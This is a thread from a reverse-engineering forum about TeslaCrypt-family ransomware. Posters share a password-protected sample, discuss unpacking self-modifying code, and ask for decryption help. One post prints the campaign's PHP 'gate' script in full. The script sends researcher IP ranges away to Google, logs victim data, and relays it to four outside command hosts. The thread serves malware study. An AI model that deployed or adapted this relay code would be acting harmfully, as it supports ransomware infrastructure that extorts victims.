A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28077  by rough_spear
 Sun Mar 20, 2016 6:11 pm
Hi,

Teslacrypt malware executable.

MD5 - 280D48953880C4A27DF69957916F718F

Regards,

rough_spear.
Attachments
password - infected.
(252.11 KiB) Downloaded 143 times
 #28287  by nautiyal.ashish
 Tue Apr 12, 2016 8:33 am
Cody Johnston wrote:AlphaCrypt - this looks heavily based on TeslaCrypt (based on some quick static analysis anyways)

I originally found a post about it here http://www.malware-traffic-analysis.net ... index.html

Attaching the sample for convenience

https://www.virustotal.com/en/file/7bdc ... 430412022/
Hi,
I tried to perform analysis on this sample.
Based on static and basic dynamic analysis, i was able to figure out its functionality.
But when i moved to OllyDbg and IdaPro, to dig deeper, I feel completely lost.
I am relatively new to reverse engineering, and have analysed 5-6 malware till date. Everytime when i used to check them on IdaPro/OllyDbg, i could actually see them using Windows libraries and it was kind of easy to follow the flow of execution.
However, with this sample, I know they are using many windows libraries because of prior analysis, but seems to have been used in a different way (I am assuming using GetProcAddress). Because of this I am not able to see the flow of execution and its hard for me to answer questions like what kind of encryption technique is into use.
Can someone tell me how to approach situations like these.
Appreciate the help :)

Regards,
Ashish
 #28293  by maximusdecimer
 Wed Apr 13, 2016 4:57 am
Ashish,

First level of today's malwares would be a polymorphic code. Sometimes two or three levels of polycode can be expected. This is called FUD to avoid av detection. Try to spend a couple of weeks to unpack them.
Very painful indeed but learn to enjoy it. Ollydbg is enough to unpack most of the samples.

Maximus
 #28424  by nautiyal.ashish
 Wed Apr 27, 2016 6:05 am
maximusdecimer wrote:Ashish,

First level of today's malwares would be a polymorphic code. Sometimes two or three levels of polycode can be expected. This is called FUD to avoid av detection. Try to spend a couple of weeks to unpack them.
Very painful indeed but learn to enjoy it. Ollydbg is enough to unpack most of the samples.

Maximus
Hi Maximusdecimer,
Thank you for the advice. I had been trying to analyse it and found as you mentioned, that this is a self modifying code. Right now still struggling with getting the dump of the actual infecting code and its OEP. However, after each analysis, I believe my understanding of the process is developing.
I tried using the common OllyDbg plugin of setting breakpoint on section hop to find OEP, but i guess the code is able to successfully evade it. If i succeed i will post my findings here :)
Regards,
Ashish
 #28438  by benkow_
 Sat Apr 30, 2016 1:17 pm
PHP gate version april 2016.
Code: Select all
<?php
$network=ip2long("23.96.0.0");
$mask=ip2long("255.248.0.0");
$remote=ip2long($_SERVER['REMOTE_ADDR']);
if (($remote & $mask)==$network){     header("Location: http://google.com");    exit; }
if($_SERVER['REMOTE_ADDR']=='63.211.192.5'){     header("Location: http://google.com");    exit; }
 
if(!isset($_POST['data'])){        die("empty post");     }
$post = array('data'=>$_POST['data'], 'IP'=>$_SERVER['REMOTE_ADDR'], 'SHELL'=>$_SERVER['SERVER_NAME'],);
 
$gate = array(
    "http://u24er.ovaarmor.com/ing.php",
    "http://l123d.feustude.at/ing.php",
    "http://k234s.ascotsprue.com/ing.php",
    "http://ik4dm.mazerunci.at/ing.php",
);                                                                                                                                                                                                        $fp = fopen("most128.txt", "a+"); fwrite($fp, 'data='.$_POST['data'].' IP='.$_SERVER['REMOTE_ADDR'].' SHELL='.$_SERVER['SERVER_NAME']."\n");  fclose($fp);
 
 
 
foreach( $gate as $value ){
    $process = curl_init();
    curl_setopt($process, CURLOPT_URL, $value);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS,$post);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
    if( ! $result = curl_exec($process)) { continue;}
    if(stristr($result,"work:")){echo $result; curl_close($process);die();}
    if(stristr($result,"INSERTED")){echo $result;curl_close($process);die();}
    curl_close($process);
}
?>
Stupid question: someone know what is this IP 63.211.192.5?
 #33154  by rammsteinse
 Fri Aug 16, 2019 1:46 am
Hello, I infected with this ransomware sample "TeslaCrypt Ransomware.rar", some important files were encrypted, now they have the extension "ecc", I have tried several tools to decrypt and none has worked for me, I need help, some of these files are very important For me, PLEASE HELP.
  • 1
  • 3
  • 4
  • 5
  • 6
  • 7